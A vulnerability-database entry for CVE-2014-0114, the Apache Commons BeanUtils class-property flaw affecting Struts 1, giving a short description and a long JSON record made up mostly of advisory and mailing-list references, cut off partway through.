Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2014-0114 (GCVE-0-2014-0114)
Vulnerability from cvelistv5 – Published: 2014-04-30 10:00 – Updated: 2024-08-06 09:05
VLAI
EPSS
Summary
Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.
Severity
No CVSS data available.
CWE
- n/a
Assigner
References
119 references
Date Public
2014-04-29 00:00
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T09:05:38.989Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "[apache-ignite-developers] 20180601 [CVE-2014-0114]: Apache Ignite is vulnerable to existing CVE-2014-0114",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "http://apache-ignite-developers.2346864.n4.nabble.com/CVE-2014-0114-Apache-Ignite-is-vulnerable-to-existing-CVE-2014-0114-td31205.html"
},
{
"name": "57477",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/57477"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.vmware.com/security/advisories/VMSA-2014-0008.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://issues.apache.org/jira/browse/BEANUTILS-463"
},
{
"name": "58710",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/58710"
},
{
"name": "MDVSA-2014:095",
"tags": [
"vendor-advisory",
"x_refsource_MANDRIVA",
"x_transferred"
],
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2014:095"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.vmware.com/security/advisories/VMSA-2014-0012.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675689"
},
{
"name": "FEDORA-2014-9380",
"tags": [
"vendor-advisory",
"x_refsource_FEDORA",
"x_transferred"
],
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-August/136958.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674812"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20140911-0001/"
},
{
"name": "59464",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/59464"
},
{
"name": "59118",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/59118"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20180629-0006/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675387"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://access.redhat.com/solutions/869353"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1091938"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://commons.apache.org/proper/commons-beanutils/javadocs/v1.9.2/RELEASE-NOTES.txt"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://advisories.mageia.org/MGASA-2014-0219.html"
},
{
"name": "60703",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/60703"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675972"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05324755"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676375"
},
{
"name": "[oss-security] 20140707 Re: CVE request for commons-beanutils: \u0027class\u0027 property is exposed, potentially leading to RCE",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "http://openwall.com/lists/oss-security/2014/07/08/1"
},
{
"name": "RHSA-2018:2669",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2018:2669"
},
{
"name": "GLSA-201607-09",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO",
"x_transferred"
],
"url": "https://security.gentoo.org/glsa/201607-09"
},
{
"name": "HPSBST03160",
"tags": [
"vendor-advisory",
"x_refsource_HP",
"x_transferred"
],
"url": "http://marc.info/?l=bugtraq\u0026m=141451023707502\u0026w=2"
},
{
"name": "20141205 NEW: VMSA-2014-0012 - VMware vSphere product updates address security vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/534161/100/0/threaded"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675898"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676110"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg27042296"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676303"
},
{
"name": "59228",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/59228"
},
{
"name": "59246",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/59246"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1116665"
},
{
"name": "[oss-security] 20140616 CVE request for commons-beanutils: \u0027class\u0027 property is exposed, potentially leading to RCE",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "http://openwall.com/lists/oss-security/2014/06/15/10"
},
{
"name": "59245",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/59245"
},
{
"name": "HPSBMU03090",
"tags": [
"vendor-advisory",
"x_refsource_HP",
"x_transferred"
],
"url": "http://marc.info/?l=bugtraq\u0026m=140801096002766\u0026w=2"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674128"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676931"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html"
},
{
"name": "60177",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/60177"
},
{
"name": "20141205 NEW: VMSA-2014-0012 - VMware vSphere product updates address security vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2014/Dec/23"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.ibm.com/support/docview.wss?uid=swg21675496"
},
{
"name": "DSA-2940",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN",
"x_transferred"
],
"url": "http://www.debian.org/security/2014/dsa-2940"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675266"
},
{
"name": "59014",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/59014"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677110"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676091"
},
{
"name": "67121",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/67121"
},
{
"name": "59480",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/59480"
},
{
"name": "HPSBGN03041",
"tags": [
"vendor-advisory",
"x_refsource_HP",
"x_transferred"
],
"url": "http://marc.info/?l=bugtraq\u0026m=140119284401582\u0026w=2"
},
{
"name": "59479",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/59479"
},
{
"name": "59704",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/59704"
},
{
"name": "58947",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/58947"
},
{
"name": "59718",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/59718"
},
{
"name": "59430",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/59430"
},
{
"name": "58851",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/58851"
},
{
"name": "[lucene-solr-user] 20190104 Re: SOLR v7 Security Issues Caused Denial of Use - Sonatype Application Composition Report",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451%40%3Csolr-user.lucene.apache.org%3E"
},
{
"name": "[infra-devnull] 20190329 [GitHub] [pulsar] massakam opened pull request #3938: Upgrade third party libraries with security vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3%40%3Cdevnull.infra.apache.org%3E"
},
{
"name": "[pulsar-commits] 20190329 [GitHub] [pulsar] massakam opened a new pull request #3938: Upgrade third party libraries with security vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c%40%3Ccommits.pulsar.apache.org%3E"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html"
},
{
"name": "[commons-issues] 20190521 [jira] [Created] (BEANUTILS-520) BeanUtils2 mitigate CVE-2014-0114",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/97fc033dad4233a5d82fcb75521eabdd23dd99ef32eb96f407f96a1a%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[commons-issues] 20190522 [jira] [Commented] (BEANUTILS-520) BeanUtils2 mitigate CVE-2014-0114",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/8e2bdfabd5b14836aa3cf900aa0a62ff9f4e22a518bb4e553ebcf55f%40%3Cissues.commons.apache.org%3E"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/65b39fa6d700e511927e5668a4038127432178a210aff81500eb36e5%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[commons-issues] 20190522 [jira] [Work logged] (BEANUTILS-520) BeanUtils2 mitigate CVE-2014-0114",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/080af531a9113e29d3f6a060e3f992dc9f40315ec7234e15c3b339e3%40%3Cissues.commons.apache.org%3E"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/ffde3f266d3bde190b54c9202169e7918a92de7e7e0337d792dc7263%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[commons-dev] 20190522 [beanutils2] CVE-2014-0114 Pull Request",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/40fc236a35801a535cd49cf1979dbeab034b833c63a284941bce5bf1%40%3Cdev.commons.apache.org%3E"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/15fcdf27fa060de276edc0b4098526afc21c236852eb3de9be9594f3%40%3Cissues.commons.apache.org%3E"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/4c3fd707a049bfe0577dba8fc9c4868ffcdabe68ad86586a0a49242e%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[commons-dev] 20190525 Re: [beanutils2] CVE-2014-0114 Pull Request",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/0340493a1ddf3660dee09a5c503449cdac5bec48cdc478de65858859%40%3Cdev.commons.apache.org%3E"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/2ba22f2e3de945039db735cf6cbf7f8be901ab2537337c7b1dd6a0f0%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[commons-commits] 20190528 [commons-beanutils] branch master updated: BEANUTILS-520: Mitigate CVE-2014-0114 by enabling SuppressPropertiesBeanIntrospector.SUPPRESS_CLASS by default. (#7)",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/31f9dc2c9cb68e390634a4202f84b8569f64b6569bfcce46348fd9fd%40%3Ccommits.commons.apache.org%3E"
},
{
"name": "[commons-issues] 20190528 [jira] [Closed] (BEANUTILS-520) BeanUtils2 mitigate CVE-2014-0114",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/098e9aae118ac5c06998a9ba4544ab2475162981d290fdef88e6f883%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[commons-notifications] 20190528 Build failed in Jenkins: commons-beanutils #74",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/fda473f46e51019a78ab217a7a3a3d48dafd90846e75bd5536ef72f3%40%3Cnotifications.commons.apache.org%3E"
},
{
"name": "[commons-commits] 20190528 [commons-beanutils] branch master updated: [BEANUTILS-520] BeanUtils2 mitigate CVE-2014-0114.",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/c24c0b931632a397142882ba248b7bd440027960f22845c6f664c639%40%3Ccommits.commons.apache.org%3E"
},
{
"name": "[commons-issues] 20190528 [jira] [Work logged] (BEANUTILS-520) BeanUtils2 mitigate CVE-2014-0114",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/42ad6326d62ea8453d0d0ce12eff39bbb7c5b4fca9639da007291346%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[commons-notifications] 20190528 Build failed in Jenkins: commons-beanutils #75",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/ebc4f019798f6ce2a39f3e0c26a9068563a9ba092cdf3ece398d4e2f%40%3Cnotifications.commons.apache.org%3E"
},
{
"name": "[commons-dev] 20190605 Re: [beanutils] Towards 1.10",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/df093c662b5e49fe9e38ef91f78ffab09d0839dea7df69a747dffa86%40%3Cdev.commons.apache.org%3E"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/9b5505632f5683ee17bda4f7878525e672226c7807d57709283ffa64%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[commons-issues] 20190615 [jira] [Updated] (BEANUTILS-520) BeanUtils2 mitigate CVE-2014-0114",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/cee6b1c4533be1a753614f6a7d7c533c42091e7cafd7053b8f62792a%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[commons-issues] 20190615 [jira] [Reopened] (BEANUTILS-520) BeanUtils2 mitigate CVE-2014-0114",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/df1c385f2112edffeff57a6b21d12e8d24031a9f578cb8ba22a947a8%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[commons-issues] 20190615 [jira] [Resolved] (BEANUTILS-520) BeanUtils2 mitigate CVE-2014-0114",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/2454e058fd05ba30ca29442fdeb7ea47505d47a888fbc9f3a53f31d0%40%3Cissues.commons.apache.org%3E"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/869c08899f34c1a70c9fb42f92ac0d043c98781317e0c19d7ba3f5e3%40%3Cissues.commons.apache.org%3E"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/084ae814e69178d2ce174cfdf149bc6e46d7524f3308c08d3adb43cb%40%3Cissues.commons.apache.org%3E"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/f3682772e62926b5c009eed63c62767021be6da0bb7427610751809f%40%3Cissues.commons.apache.org%3E"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/aa4ca069c7aea5b1d7329bc21576c44a39bcc4eb7bb2760c4b16f2f6%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[commons-dev] 20190814 [SECURITY] CVE-2019-10086. Apache Commons Beanutils does not suppresses the class property in PropertyUtilsBean by default.",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/88c497eead24ed517a2bb3159d3dc48725c215e97fe7a98b2cf3ea25%40%3Cdev.commons.apache.org%3E"
},
{
"name": "[commons-user] 20190814 [SECURITY] CVE-2019-10086. Apache Commons Beanutils does not suppresses the class property in PropertyUtilsBean by default.",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/0a35108a56e2d575e3b3985588794e39fbf264097aba66f4c5569e4f%40%3Cuser.commons.apache.org%3E"
},
{
"name": "[announce] 20190814 [SECURITY] CVE-2019-10086. Apache Commons Beanutils does not suppresses the class property in PropertyUtilsBean by default.",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/918ec15a80fc766ff46c5d769cb8efc88fed6674faadd61a7105166b%40%3Cannounce.apache.org%3E"
},
{
"name": "[commons-issues] 20190818 [jira] [Commented] (BEANUTILS-520) BeanUtils2 mitigate CVE-2014-0114",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/c7e31c3c90b292e0bafccc4e1b19c9afc1503a65d82cb7833dfd7478%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[activemq-gitbox] 20190903 [GitHub] [activemq-artemis] jeloba opened a new pull request #2820: Updated Apache BeanUtils to address CVE",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/d27c51b3c933f885460aa6d3004eb228916615caaaddbb8e8bfeeb40%40%3Cgitbox.activemq.apache.org%3E"
},
{
"name": "[activemq-issues] 20190904 [jira] [Created] (ARTEMIS-2470) Update Apache BeanUtils to Address CVE-2014-0114",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/3f500972dceb48e3cb351f58565aecf6728b1ea7a69593af86c30b30%40%3Cissues.activemq.apache.org%3E"
},
{
"name": "[commons-commits] 20190906 [commons-configuration] branch master updated: [CONFIGURATION-755][CVE-2014-0114] Update Apache Commons BeanUtils from 1.9.3 to 1.9.4.",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/1565e8b786dff4cb3b48ecc8381222c462c92076c9e41408158797b5%40%3Ccommits.commons.apache.org%3E"
},
{
"name": "[commons-issues] 20190906 [jira] [Updated] (CONFIGURATION-755) [CVE-2014-0114] Update Apache Commons BeanUtils from 1.9.3 to 1.9.4.",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[commons-issues] 20190906 [jira] [Closed] (CONFIGURATION-755) [CVE-2014-0114] Update Apache Commons BeanUtils from 1.9.3 to 1.9.4.",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[activemq-issues] 20190909 [jira] [Work logged] (ARTEMIS-2470) Update Apache BeanUtils to Address CVE-2014-0114",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/0efed939139f5b9dcd62b8acf7cb8a9789227d14abdc0c6f141c4a4c%40%3Cissues.activemq.apache.org%3E"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/09981ae3df188a2ad1ce20f62ef76a5b2d27cf6b9ebab366cf1d6cc6%40%3Cissues.commons.apache.org%3E"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/6b30629b32d020c40d537f00b004d281c37528d471de15ca8aec2cd4%40%3Cissues.commons.apache.org%3E"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/6afe2f935493e69a332b9c5a4f23cafe95c15ede1591a492cf612293%40%3Cissues.commons.apache.org%3E"
},
{
"name": "RHSA-2019:2995",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2019:2995"
},
{
"name": "[commons-issues] 20191014 [jira] [Updated] (BEANUTILS-520) Mitigate CVE-2014-0114",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/66176fa3caeca77058d9f5b0316419a43b4c3fa2b572e05b87132226%40%3Cissues.commons.apache.org%3E"
},
{
"name": "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E"
},
{
"name": "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E"
},
{
"name": "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E"
},
{
"name": "[druid-commits] 20191115 [GitHub] [incubator-druid] ccaominh opened a new pull request #8878: Address security vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3E"
},
{
"name": "[activemq-issues] 20200109 [jira] [Resolved] (ARTEMIS-2470) Update Apache BeanUtils to Address CVE-2014-0114",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/r75d67108e557bb5d4c4318435067714a0180de525314b7e8dab9d04e%40%3Cissues.activemq.apache.org%3E"
},
{
"name": "[lucene-solr-user] 20200320 CVEs (vulnerabilities) that apply to Solr 8.4.1",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3Csolr-user.lucene.apache.org%3E"
},
{
"name": "[lucene-solr-user] 20200320 Re: CVEs (vulnerabilities) that apply to Solr 8.4.1",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55%40%3Csolr-user.lucene.apache.org%3E"
},
{
"name": "[dolphinscheduler-commits] 20210121 [GitHub] [incubator-dolphinscheduler] c-f-cooper commented on issue #4506: There is a vulnerability in beanutils 1.7.0,upgrade recommended",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/r458d61eaeadecaad04382ebe583230bc027f48d9e85e4731bc573477%40%3Ccommits.dolphinscheduler.apache.org%3E"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2014-04-29T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-01-21T14:06:10.000Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"name": "[apache-ignite-developers] 20180601 [CVE-2014-0114]: Apache Ignite is vulnerable to existing CVE-2014-0114",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "http://apache-ignite-developers.2346864.n4.nabble.com/CVE-2014-0114-Apache-Ignite-is-vulnerable-to-existing-CVE-2014-0114-td31205.html"
},
{
"name": "57477",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/57477"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.vmware.com/security/advisories/VMSA-2014-0008.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://issues.apache.org/jira/browse/BEANUTILS-463"
},
{
"name": "58710",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/58710"
},
{
"name": "MDVSA-2014:095",
"tags": [
"vendor-advisory",
"x_refsource_MANDRIVA"
],
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2014:095"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
